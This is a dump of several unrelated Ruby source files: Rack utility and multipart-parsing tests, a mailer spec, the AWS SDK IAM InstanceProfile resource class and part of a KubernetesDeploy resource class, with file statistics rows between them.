h["foo"].should.be.nil
h["FOO"].should.be.nil
end
should "return the deleted value when #delete is called on an existing key" do
h = Rack::Utils::HeaderHash.new("foo" => "bar")
h.delete("Foo").should.equal("bar")
end
should "return nil when #delete is called on a non-existant key" do
h = Rack::Utils::HeaderHash.new("foo" => "bar")
h.delete("Hello").should.be.nil
end
should "avoid unnecessary object creation if possible" do
a = Rack::Utils::HeaderHash.new("foo" => "bar")
b = Rack::Utils::HeaderHash.new(a)
b.object_id.should.equal(a.object_id)
b.should.equal(a)
end
should "convert Array values to Strings when responding to #each" do
h = Rack::Utils::HeaderHash.new("foo" => ["bar", "baz"])
h.each do |k,v|
k.should.equal("foo")
v.should.equal("bar\nbaz")
end
end
should "not create headers out of thin air" do
h = Rack::Utils::HeaderHash.new
h['foo']
h['foo'].should.be.nil
h.should.not.include 'foo'
end
end
describe Rack::Utils::Context do
class ContextTest
attr_reader :app
def initialize app; @app=app; end
def call env; context env; end
def context env, app=@app; app.call(env); end
end
test_target1 = proc{|e| e.to_s+' world' }
test_target2 = proc{|e| e.to_i+2 }
test_target3 = proc{|e| nil }
test_target4 = proc{|e| [200,{'Content-Type'=>'text/plain', 'Content-Length'=>'0'},['']] }
test_app = ContextTest.new test_target4
should "set context correctly" do
test_app.app.should.equal test_target4
c1 = Rack::Utils::Context.new(test_app, test_target1)
c1.for.should.equal test_app
c1.app.should.equal test_target1
c2 = Rack::Utils::Context.new(test_app, test_target2)
c2.for.should.equal test_app
c2.app.should.equal test_target2
end
should "alter app on recontexting" do
c1 = Rack::Utils::Context.new(test_app, test_target1)
c2 = c1.recontext(test_target2)
c2.for.should.equal test_app
c2.app.should.equal test_target2
c3 = c2.recontext(test_target3)
c3.for.should.equal test_app
c3.app.should.equal test_target3
end
should "run different apps" do
c1 = Rack::Utils::Context.new test_app, test_target1
c2 = c1.recontext test_target2
c3 = c2.recontext test_target3
c4 = c3.recontext test_target4
a4 = Rack::Lint.new c4
a5 = Rack::Lint.new test_app
r1 = c1.call('hello')
r1.should.equal 'hello world'
r2 = c2.call(2)
r2.should.equal 4
r3 = c3.call(:misc_symbol)
r3.should.be.nil
r4 = Rack::MockRequest.new(a4).get('/')
r4.status.should.equal 200
r5 = Rack::MockRequest.new(a5).get('/')
r5.status.should.equal 200
r4.body.should.equal r5.body
end
end
describe Rack::Utils::Multipart do
def multipart_fixture(name)
file = multipart_file(name)
data = File.open(file, 'rb') { |io| io.read }
type = "multipart/form-data; boundary=AaB03x"
length = data.respond_to?(:bytesize) ? data.bytesize : data.size
{ "CONTENT_TYPE" => type,
"CONTENT_LENGTH" => length.to_s,
:input => StringIO.new(data) }
end
def multipart_file(name)
File.join(File.dirname(__FILE__), "multipart", name.to_s)
end
should "return nil if content type is not multipart" do
env = Rack::MockRequest.env_for("/",
"CONTENT_TYPE" => 'application/x-www-form-urlencoded')
Rack::Utils::Multipart.parse_multipart(env).should.equal nil
end
should "parse multipart upload with text file" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:text))
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"][:type].should.equal "text/plain"
params["files"][:filename].should.equal "file1.txt"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; filename=\"file1.txt\"\r\n" +
"Content-Type: text/plain\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse multipart upload with nested parameters" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:nested))
params = Rack::Utils::Multipart.parse_multipart(env)
params["foo"]["submit-name"].should.equal "Larry"
params["foo"]["files"][:type].should.equal "text/plain"
params["foo"]["files"][:filename].should.equal "file1.txt"
params["foo"]["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"foo[files]\"; filename=\"file1.txt\"\r\n" +
"Content-Type: text/plain\r\n"
params["foo"]["files"][:name].should.equal "foo[files]"
params["foo"]["files"][:tempfile].read.should.equal "contents"
end
should "parse multipart upload with binary file" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:binary))
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"][:type].should.equal "image/png"
params["files"][:filename].should.equal "rack-logo.png"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; filename=\"rack-logo.png\"\r\n" +
"Content-Type: image/png\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.length.should.equal 26473
end
should "parse multipart upload with empty file" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:empty))
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"][:type].should.equal "text/plain"
params["files"][:filename].should.equal "file1.txt"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; filename=\"file1.txt\"\r\n" +
"Content-Type: text/plain\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal ""
end
should "parse multipart upload with filename with semicolons" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:semicolon))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "text/plain"
params["files"][:filename].should.equal "fi;le1.txt"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; filename=\"fi;le1.txt\"\r\n" +
"Content-Type: text/plain\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "not include file params if no file was selected" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:none))
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"].should.equal nil
params.keys.should.not.include "files"
end
should "parse IE multipart upload and clean up filename" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:ie))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "text/plain"
params["files"][:filename].should.equal "file1.txt"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; " +
'filename="C:\Documents and Settings\Administrator\Desktop\file1.txt"' +
"\r\nContent-Type: text/plain\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse filename and modification param" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:filename_and_modification_param))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "image/jpeg"
params["files"][:filename].should.equal "genome.jpeg"
params["files"][:head].should.equal "Content-Type: image/jpeg\r\n" +
"Content-Disposition: attachment; " +
"name=\"files\"; " +
"filename=genome.jpeg; " +
"modification-date=\"Wed, 12 Feb 1997 16:29:51 -0500\";\r\n" +
"Content-Description: a complete map of the human genome\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse filename with escaped quotes" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:filename_with_escaped_quotes))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "application/octet-stream"
params["files"][:filename].should.equal "escape \"quotes"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; " +
"filename=\"escape \\\"quotes\"\r\n" +
"Content-Type: application/octet-stream\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse filename with percent escaped quotes" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:filename_with_percent_escaped_quotes))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "application/octet-stream"
params["files"][:filename].should.equal "escape \"quotes"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; " +
"filename=\"escape %22quotes\"\r\n" +
"Content-Type: application/octet-stream\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse filename with unescaped quotes" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:filename_with_unescaped_quotes))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "application/octet-stream"
params["files"][:filename].should.equal "escape \"quotes"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; " +
"filename=\"escape \"quotes\"\r\n" +
"Content-Type: application/octet-stream\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse filename with escaped quotes and modification param" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:filename_with_escaped_quotes_and_modification_param))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "image/jpeg"
params["files"][:filename].should.equal "\"human\" genome.jpeg"
params["files"][:head].should.equal "Content-Type: image/jpeg\r\n" +
"Content-Disposition: attachment; " +
"name=\"files\"; " +
"filename=\"\"human\" genome.jpeg\"; " +
"modification-date=\"Wed, 12 Feb 1997 16:29:51 -0500\";\r\n" +
"Content-Description: a complete map of the human genome\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
it "rewinds input after parsing upload" do
options = multipart_fixture(:text)
input = options[:input]
env = Rack::MockRequest.env_for("/", options)
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"][:filename].should.equal "file1.txt"
input.read.length.should.equal 197
end
it "builds multipart body" do
files = Rack::Utils::Multipart::UploadedFile.new(multipart_file("file1.txt"))
data = Rack::Utils::Multipart.build_multipart("submit-name" => "Larry", "files" => files)
options = {
"CONTENT_TYPE" => "multipart/form-data; boundary=AaB03x",
"CONTENT_LENGTH" => data.length.to_s,
:input => StringIO.new(data)
}
env = Rack::MockRequest.env_for("/", options)
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"][:filename].should.equal "file1.txt"
params["files"][:tempfile].read.should.equal "contents"
end
it "builds nested multipart body" do
files = Rack::Utils::Multipart::UploadedFile.new(multipart_file("file1.txt"))
data = Rack::Utils::Multipart.build_multipart("people" => [{"submit-name" => "Larry", "files" => files}])
options = {
"CONTENT_TYPE" => "multipart/form-data; boundary=AaB03x",
"CONTENT_LENGTH" => data.length.to_s,
:input => StringIO.new(data)
}
env = Rack::MockRequest.env_for("/", options)
params = Rack::Utils::Multipart.parse_multipart(env)
params["people"][0]["submit-name"].should.equal "Larry"
params["people"][0]["files"][:filename].should.equal "file1.txt"
params["people"][0]["files"][:tempfile].read.should.equal "contents"
end
it "can parse fields that end at the end of the buffer" do
input = File.read(multipart_file("bad_robots"))
req = Rack::Request.new Rack::MockRequest.env_for("/",
"CONTENT_TYPE" => "multipart/form-data, boundary=1yy3laWhgX31qpiHinh67wJXqKalukEUTvqTzmon",
"CONTENT_LENGTH" => input.size,
:input => input)
req.POST['file.path'].should.equal "/var/tmp/uploads/4/0001728414"
req.POST['addresses'].should.not.equal nil
end
it "builds complete params with the chunk size of 16384 slicing exactly on boundary" do
data = File.open(multipart_file("fail_16384_nofile")) { |f| f.read }.gsub(/\n/, "\r\n")
options = {
"CONTENT_TYPE" => "multipart/form-data; boundary=----WebKitFormBoundaryWsY0GnpbI5U7ztzo",
"CONTENT_LENGTH" => data.length.to_s,
:input => StringIO.new(data)
}
env = Rack::MockRequest.env_for("/", options)
params = Rack::Utils::Multipart.parse_multipart(env)
params.should.not.equal nil
params.keys.should.include "AAAAAAAAAAAAAAAAAAA"
params["AAAAAAAAAAAAAAAAAAA"].keys.should.include "PLAPLAPLA_MEMMEMMEMM_ATTRATTRER"
params["AAAAAAAAAAAAAAAAAAA"]["PLAPLAPLA_MEMMEMMEMM_ATTRATTRER"].keys.should.include "new"
params["AAAAAAAAAAAAAAAAAAA"]["PLAPLAPLA_MEMMEMMEMM_ATTRATTRER"]["new"].keys.should.include "-2"
params["AAAAAAAAAAAAAAAAAAA"]["PLAPLAPLA_MEMMEMMEMM_ATTRATTRER"]["new"]["-2"].keys.should.include "ba_unit_id"
params["AAAAAAAAAAAAAAAAAAA"]["PLAPLAPLA_MEMMEMMEMM_ATTRATTRER"]["new"]["-2"]["ba_unit_id"].should.equal "1017"
end
should "return nil if no UploadedFiles were used" do
data = Rack::Utils::Multipart.build_multipart("people" => [{"submit-name" => "Larry", "files" => "contents"}])
data.should.equal nil
end
should "raise ArgumentError if params is not a Hash" do
lambda { Rack::Utils::Multipart.build_multipart("foo=bar") }.
should.raise(ArgumentError).
message.should.equal "value must be a Hash"
end
end
| 42.707965 | 115 | 0.632926 |
b94e2c7f766b237e5300602cc5b07be6a1cece0d | 666 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe MessageMailer, type: :mailer do
it 'sends to the given contact' do
message = Message.new(email: '[email protected]',
message: 'Waow',
name: 'David')
mail = MessageMailer.email(message)
mail.cc.should eq(['[email protected]'])
end
it 'includes the text' do
message = Message.new(email: '[email protected]',
message: 'Waow - mitt meddelande',
name: 'David')
mail = MessageMailer.email(message)
mail.body.should include('Waow - mitt meddelande')
end
end
| 27.75 | 60 | 0.59009 |
b9399cfe3eb1b9e7cc91ea23fbaf72b808cc1b38 | 11,250 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::IAM
class InstanceProfile
extend Aws::Deprecations
# @overload def initialize(name, options = {})
# @param [String] name
# @option options [Client] :client
# @overload def initialize(options = {})
# @option options [required, String] :name
# @option options [Client] :client
def initialize(*args)
options = Hash === args.last ? args.pop.dup : {}
@name = extract_name(args, options)
@data = options.delete(:data)
@client = options.delete(:client) || Client.new(options)
@waiter_block_warned = false
end
# @!group Read-Only Attributes
# @return [String]
def name
@name
end
alias :instance_profile_name :name
# The path to the instance profile. For more information about paths,
# see [IAM identifiers][1] in the *IAM User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_Identifiers.html
# @return [String]
def path
data[:path]
end
# The stable and unique string identifying the instance profile. For
# more information about IDs, see [IAM identifiers][1] in the *IAM User
# Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_Identifiers.html
# @return [String]
def instance_profile_id
data[:instance_profile_id]
end
# The Amazon Resource Name (ARN) specifying the instance profile. For
# more information about ARNs and how to use them in policies, see [IAM
# identifiers][1] in the *IAM User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_Identifiers.html
# @return [String]
def arn
data[:arn]
end
# The date when the instance profile was created.
# @return [Time]
def create_date
data[:create_date]
end
# A list of tags that are attached to the instance profile. For more
# information about tagging, see [Tagging IAM resources][1] in the *IAM
# User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_tags.html
# @return [Array<Types::Tag>]
def tags
data[:tags]
end
# @!endgroup
# @return [Client]
def client
@client
end
# Loads, or reloads {#data} for the current {InstanceProfile}.
# Returns `self` making it possible to chain methods.
#
# instance_profile.reload.data
#
# @return [self]
def load
resp = @client.get_instance_profile(instance_profile_name: @name)
@data = resp.instance_profile
self
end
alias :reload :load
# @return [Types::InstanceProfile]
# Returns the data for this {InstanceProfile}. Calls
# {Client#get_instance_profile} if {#data_loaded?} is `false`.
def data
load unless @data
@data
end
# @return [Boolean]
# Returns `true` if this resource is loaded. Accessing attributes or
# {#data} on an unloaded resource will trigger a call to {#load}.
def data_loaded?
!!@data
end
# @param [Hash] options ({})
# @return [Boolean]
# Returns `true` if the InstanceProfile exists.
def exists?(options = {})
begin
wait_until_exists(options.merge(max_attempts: 1))
true
rescue Aws::Waiters::Errors::UnexpectedError => e
raise e.error
rescue Aws::Waiters::Errors::WaiterFailed
false
end
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (40)
# @option options [Float] :delay (1)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [InstanceProfile]
def wait_until_exists(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::InstanceProfileExists.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(instance_profile_name: @name))
InstanceProfile.new({
name: @name,
client: @client
})
end
# @deprecated Use [Aws::IAM::Client] #wait_until instead
#
# Waiter polls an API operation until a resource enters a desired
# state.
#
# @note The waiting operation is performed on a copy. The original resource
# remains unchanged.
#
# ## Basic Usage
#
    # The waiter polls until it is successful, until it fails by
    # entering a terminal state, or until a maximum number of attempts
    # are made.
#
# # polls in a loop until condition is true
# resource.wait_until(options) {|resource| condition}
#
# ## Example
#
# instance.wait_until(max_attempts:10, delay:5) do |instance|
# instance.state.name == 'running'
# end
#
# ## Configuration
#
# You can configure the maximum number of polling attempts, and the
# delay (in seconds) between each polling attempt. The waiting condition is
# set by passing a block to {#wait_until}:
#
# # poll for ~25 seconds
# resource.wait_until(max_attempts:5,delay:5) {|resource|...}
#
# ## Callbacks
#
# You can be notified before each polling attempt and before each
# delay. If you throw `:success` or `:failure` from these callbacks,
# it will terminate the waiter.
#
# started_at = Time.now
# # poll for 1 hour, instead of a number of attempts
# proc = Proc.new do |attempts, response|
# throw :failure if Time.now - started_at > 3600
# end
#
# # disable max attempts
# instance.wait_until(before_wait:proc, max_attempts:nil) {...}
#
# ## Handling Errors
#
# When a waiter is successful, it returns the Resource. When a waiter
# fails, it raises an error.
#
# begin
# resource.wait_until(...)
# rescue Aws::Waiters::Errors::WaiterFailed
# # resource did not enter the desired state in time
# end
#
# @yieldparam [Resource] resource to be used in the waiting condition.
#
# @raise [Aws::Waiters::Errors::FailureStateError] Raised when the waiter
# terminates because the waiter has entered a state that it will not
# transition out of, preventing success.
    #
    # @raise [Aws::Waiters::Errors::TooManyAttemptsError] Raised when the
    #   configured maximum number of attempts have been made and the waiter
    #   is not yet successful.
#
# @raise [Aws::Waiters::Errors::UnexpectedError] Raised when an error is
# encountered while polling for a resource that is not expected.
#
    # @raise [NotImplementedError] Raised when the resource does not
    #   have a #reload method.
    #
# @option options [Integer] :max_attempts (10) Maximum number of
# attempts
# @option options [Integer] :delay (10) Delay between each
# attempt in seconds
# @option options [Proc] :before_attempt (nil) Callback
# invoked before each attempt
# @option options [Proc] :before_wait (nil) Callback
# invoked before each wait
# @return [Resource] if the waiter was successful
def wait_until(options = {}, &block)
self_copy = self.dup
attempts = 0
options[:max_attempts] = 10 unless options.key?(:max_attempts)
options[:delay] ||= 10
options[:poller] = Proc.new do
attempts += 1
if block.call(self_copy)
[:success, self_copy]
else
self_copy.reload unless attempts == options[:max_attempts]
:retry
end
end
Aws::Waiters::Waiter.new(options).wait({})
end
# @!group Actions
# @example Request syntax with placeholder values
#
# instance_profile.add_role({
# role_name: "roleNameType", # required
# })
# @param [Hash] options ({})
# @option options [required, String] :role_name
# The name of the role to add.
#
# This parameter allows (through its [regex pattern][1]) a string of
# characters consisting of upper and lowercase alphanumeric characters
# with no spaces. You can also include any of the following characters:
# \_+=,.@-
#
#
#
# [1]: http://wikipedia.org/wiki/regex
# @return [EmptyStructure]
def add_role(options = {})
options = options.merge(instance_profile_name: @name)
resp = @client.add_role_to_instance_profile(options)
resp.data
end
# @example Request syntax with placeholder values
#
# instance_profile.delete()
# @param [Hash] options ({})
# @return [EmptyStructure]
def delete(options = {})
options = options.merge(instance_profile_name: @name)
resp = @client.delete_instance_profile(options)
resp.data
end
# @example Request syntax with placeholder values
#
# instance_profile.remove_role({
# role_name: "roleNameType", # required
# })
# @param [Hash] options ({})
# @option options [required, String] :role_name
# The name of the role to remove.
#
# This parameter allows (through its [regex pattern][1]) a string of
# characters consisting of upper and lowercase alphanumeric characters
# with no spaces. You can also include any of the following characters:
# \_+=,.@-
#
#
#
# [1]: http://wikipedia.org/wiki/regex
# @return [EmptyStructure]
def remove_role(options = {})
options = options.merge(instance_profile_name: @name)
resp = @client.remove_role_from_instance_profile(options)
resp.data
end
# @!group Associations
# @return [Role::Collection]
def roles
batch = []
data[:roles].each do |d|
batch << Role.new(
name: d[:role_name],
data: d,
client: @client
)
end
Role::Collection.new([batch], size: batch.size)
end
# @deprecated
# @api private
def identifiers
{ name: @name }
end
deprecated(:identifiers)
private
def extract_name(args, options)
value = args[0] || options.delete(:name)
case value
when String then value
when nil then raise ArgumentError, "missing required option :name"
else
msg = "expected :name to be a String, got #{value.class}"
raise ArgumentError, msg
end
end
def yield_waiter_and_warn(waiter, &block)
if !@waiter_block_warned
msg = "pass options to configure the waiter; "\
"yielding the waiter is deprecated"
warn(msg)
@waiter_block_warned = true
end
yield(waiter.waiter)
end
def separate_params_and_options(options)
opts = Set.new(
[:client, :max_attempts, :delay, :before_attempt, :before_wait]
)
waiter_opts = {}
waiter_params = {}
options.each_pair do |key, value|
if opts.include?(key)
waiter_opts[key] = value
else
waiter_params[key] = value
end
end
waiter_opts[:client] ||= @client
[waiter_opts, waiter_params]
end
class Collection < Aws::Resources::Collection; end
end
end
| 29.605263 | 82 | 0.621244 |
219f2b9032d808de6586195d61615e120a8b6c8e | 161 | require File.expand_path('../../../../spec_helper', __FILE__)
describe "Gem::Requirement#for_lockfile" do
it "needs to be reviewed for spec completeness"
end
| 26.833333 | 61 | 0.732919 |
1a69db24bfe352b49bcbf0edd5be916da0c6add8 | 244 | require "active_support/all"
module TranslationsChecker
module Concerns
module Service
extend ActiveSupport::Concern
class_methods do
def call(*args)
new(*args).call
end
end
end
end
end
| 15.25 | 35 | 0.631148 |
016ba3018f09491cb0ee373d085750b59243db68 | 12,552 | # frozen_string_literal: true
require 'json'
require 'open3'
require 'shellwords'
module KubernetesDeploy
class KubernetesResource
attr_reader :name, :namespace, :context
attr_writer :type, :deploy_started_at
GLOBAL = false
TIMEOUT = 5.minutes
LOG_LINE_COUNT = 250
DISABLE_FETCHING_LOG_INFO = 'DISABLE_FETCHING_LOG_INFO'
DISABLE_FETCHING_EVENT_INFO = 'DISABLE_FETCHING_EVENT_INFO'
DISABLED_LOG_INFO_MESSAGE = "collection is disabled by the #{DISABLE_FETCHING_LOG_INFO} env var."
DISABLED_EVENT_INFO_MESSAGE = "collection is disabled by the #{DISABLE_FETCHING_EVENT_INFO} env var."
DEBUG_RESOURCE_NOT_FOUND_MESSAGE = "None found. Please check your usual logging service (e.g. Splunk)."
UNUSUAL_FAILURE_MESSAGE = <<~MSG
It is very unusual for this resource type to fail to deploy. Please try the deploy again.
If that new deploy also fails, contact your cluster administrator.
MSG
STANDARD_TIMEOUT_MESSAGE = <<~MSG
Kubernetes will continue to attempt to deploy this resource in the cluster, but at this point it is considered unlikely that it will succeed.
If you have reason to believe it will succeed, retry the deploy to continue to monitor the rollout.
MSG
TIMEOUT_OVERRIDE_ANNOTATION = "kubernetes-deploy.shopify.io/timeout-override"
class << self
def build(namespace:, context:, definition:, logger:, statsd_tags:)
opts = { namespace: namespace, context: context, definition: definition, logger: logger,
statsd_tags: statsd_tags }
if definition["kind"].blank?
raise InvalidTemplateError.new("Template missing 'Kind'", content: definition.to_yaml)
elsif KubernetesDeploy.const_defined?(definition["kind"])
klass = KubernetesDeploy.const_get(definition["kind"])
klass.new(**opts)
else
inst = new(**opts)
inst.type = definition["kind"]
inst
end
end
def timeout
self::TIMEOUT
end
def kind
name.demodulize
end
end
def timeout
return timeout_override if timeout_override.present?
self.class.timeout
end
def timeout_override
return @timeout_override if defined?(@timeout_override)
@timeout_override = DurationParser.new(timeout_annotation).parse!.to_i
rescue DurationParser::ParsingError
@timeout_override = nil
end
def pretty_timeout_type
"timeout: #{timeout}s"
end
def initialize(namespace:, context:, definition:, logger:, statsd_tags: [])
# subclasses must also set these if they define their own initializer
@name = definition.dig("metadata", "name")
unless @name.present?
logger.summary.add_paragraph("Rendered template content:\n#{definition.to_yaml}")
raise FatalDeploymentError, "Template is missing required field metadata.name"
end
@optional_statsd_tags = statsd_tags
@namespace = namespace
@context = context
@logger = logger
@definition = definition
@statsd_report_done = false
@validation_errors = []
@instance_data = {}
end
def validate_definition(kubectl)
@validation_errors = []
validate_timeout_annotation
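      # Validate the definition with a kubectl dry-run create; nothing is persisted to the cluster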
command = ["create", "-f", file_path, "--dry-run", "--output=name"]
_, err, st = kubectl.run(*command, log_failure: false)
return true if st.success?
@validation_errors << err
false
end
def validation_error_msg
@validation_errors.join("\n")
end
def validation_failed?
@validation_errors.present?
end
def id
"#{type}/#{name}"
end
def file_path
file.path
end
def sync(mediator)
@instance_data = mediator.get_instance(kubectl_resource_type, name)
end
def deploy_failed?
false
end
def deploy_started?
@deploy_started_at.present?
end
def deploy_succeeded?
return false unless deploy_started?
unless @success_assumption_warning_shown
@logger.warn("Don't know how to monitor resources of type #{type}. Assuming #{id} deployed successfully.")
@success_assumption_warning_shown = true
end
true
end
def exists?
@instance_data.present?
end
def current_generation
return -1 unless exists? # must be different default than observed_generation
@instance_data["metadata"]["generation"]
end
def observed_generation
return -2 unless exists?
# populating this is a best practice, but not all controllers actually do it
@instance_data["status"]["observedGeneration"]
end
def status
exists? ? "Exists" : "Unknown"
end
def type
@type || self.class.kind
end
def kubectl_resource_type
type
end
def deploy_timed_out?
return false unless deploy_started?
!deploy_succeeded? && !deploy_failed? && (Time.now.utc - @deploy_started_at > timeout)
end
# Expected values: :apply, :replace, :replace_force
def deploy_method
:apply
end
def sync_debug_info(kubectl)
@events = fetch_events(kubectl) unless ENV[DISABLE_FETCHING_EVENT_INFO]
      @logs = fetch_logs(kubectl) if supports_logs? && !ENV[DISABLE_FETCHING_LOG_INFO]
@debug_info_synced = true
end
def debug_message(cause = nil, info_hash = {})
helpful_info = []
if cause == :gave_up
helpful_info << ColorizedString.new("#{id}: GLOBAL WATCH TIMEOUT (#{info_hash[:timeout]} seconds)").yellow
helpful_info << "If you expected it to take longer than #{info_hash[:timeout]} seconds for your deploy"\
" to roll out, increase --max-watch-seconds."
elsif deploy_failed?
helpful_info << ColorizedString.new("#{id}: FAILED").red
helpful_info << failure_message if failure_message.present?
elsif deploy_timed_out?
helpful_info << ColorizedString.new("#{id}: TIMED OUT (#{pretty_timeout_type})").yellow
helpful_info << timeout_message if timeout_message.present?
else
# Arriving in debug_message when we neither failed nor timed out is very unexpected. Dump all available info.
helpful_info << ColorizedString.new("#{id}: MONITORING ERROR").red
helpful_info << failure_message if failure_message.present?
helpful_info << timeout_message if timeout_message.present? && timeout_message != STANDARD_TIMEOUT_MESSAGE
end
helpful_info << " - Final status: #{status}"
if @events.present?
helpful_info << " - Events (common success events excluded):"
@events.each do |identifier, event_hashes|
event_hashes.each { |event| helpful_info << " [#{identifier}]\t#{event}" }
end
elsif ENV[DISABLE_FETCHING_EVENT_INFO]
helpful_info << " - Events: #{DISABLED_EVENT_INFO_MESSAGE}"
else
helpful_info << " - Events: #{DEBUG_RESOURCE_NOT_FOUND_MESSAGE}"
end
if supports_logs?
if ENV[DISABLE_FETCHING_LOG_INFO]
helpful_info << " - Logs: #{DISABLED_LOG_INFO_MESSAGE}"
elsif @logs.blank? || @logs.values.all?(&:blank?)
helpful_info << " - Logs: #{DEBUG_RESOURCE_NOT_FOUND_MESSAGE}"
else
sorted_logs = @logs.sort_by { |_, log_lines| log_lines.length }
sorted_logs.each do |identifier, log_lines|
if log_lines.empty?
helpful_info << " - Logs from container '#{identifier}': #{DEBUG_RESOURCE_NOT_FOUND_MESSAGE}"
next
end
helpful_info << " - Logs from container '#{identifier}' (last #{LOG_LINE_COUNT} lines shown):"
log_lines.each do |line|
helpful_info << " #{line}"
end
end
end
end
helpful_info.join("\n")
end
# Returns a hash in the following format:
# {
# "pod/web-1" => [
# "Pulling: pulling image "hello-world:latest" (1 events)",
# "Pulled: Successfully pulled image "hello-world:latest" (1 events)"
# ]
# }
def fetch_events(kubectl)
return {} unless exists?
out, _err, st = kubectl.run("get", "events", "--output=go-template=#{Event.go_template_for(type, name)}",
log_failure: false)
return {} unless st.success?
event_collector = Hash.new { |hash, key| hash[key] = [] }
Event.extract_all_from_go_template_blob(out).each_with_object(event_collector) do |candidate, events|
events[id] << candidate.to_s if candidate.seen_since?(@deploy_started_at - 5.seconds)
end
end
def timeout_message
STANDARD_TIMEOUT_MESSAGE
end
def failure_message
end
def pretty_status
padding = " " * [50 - id.length, 1].max
"#{id}#{padding}#{status}"
end
def report_status_to_statsd(watch_time)
unless @statsd_report_done
::StatsD.measure('resource.duration', watch_time, tags: statsd_tags)
@statsd_report_done = true
end
end
class Event
EVENT_SEPARATOR = "ENDEVENT--BEGINEVENT"
FIELD_SEPARATOR = "ENDFIELD--BEGINFIELD"
FIELDS = %w(
.involvedObject.kind
.involvedObject.name
.count
.lastTimestamp
.reason
.message
)
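      # Builds a go-template that selects events belonging to this resource and
      # filters out routine success reasons (Started, Created, Scheduled, etc.)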
def self.go_template_for(kind, name)
and_conditions = [
%[(eq .involvedObject.kind "#{kind}")],
%[(eq .involvedObject.name "#{name}")],
'(ne .reason "Started")',
'(ne .reason "Created")',
'(ne .reason "SuccessfulCreate")',
'(ne .reason "Scheduled")',
'(ne .reason "Pulling")',
'(ne .reason "Pulled")'
]
condition_start = "{{if and #{and_conditions.join(' ')}}}"
field_part = FIELDS.map { |f| "{{#{f}}}" }.join(%({{print "#{FIELD_SEPARATOR}"}}))
%({{range .items}}#{condition_start}#{field_part}{{print "#{EVENT_SEPARATOR}"}}{{end}}{{end}})
end
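      # Splits kubectl's go-template output back into Event objects using the sentinel separators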
def self.extract_all_from_go_template_blob(blob)
blob.split(EVENT_SEPARATOR).map do |event_blob|
pieces = event_blob.split(FIELD_SEPARATOR, FIELDS.length)
new(
subject_kind: pieces[FIELDS.index(".involvedObject.kind")],
subject_name: pieces[FIELDS.index(".involvedObject.name")],
count: pieces[FIELDS.index(".count")],
last_timestamp: pieces[FIELDS.index(".lastTimestamp")],
reason: pieces[FIELDS.index(".reason")],
message: pieces[FIELDS.index(".message")]
)
end
end
def initialize(subject_kind:, last_timestamp:, reason:, message:, count:, subject_name:)
@subject_kind = subject_kind
@subject_name = subject_name
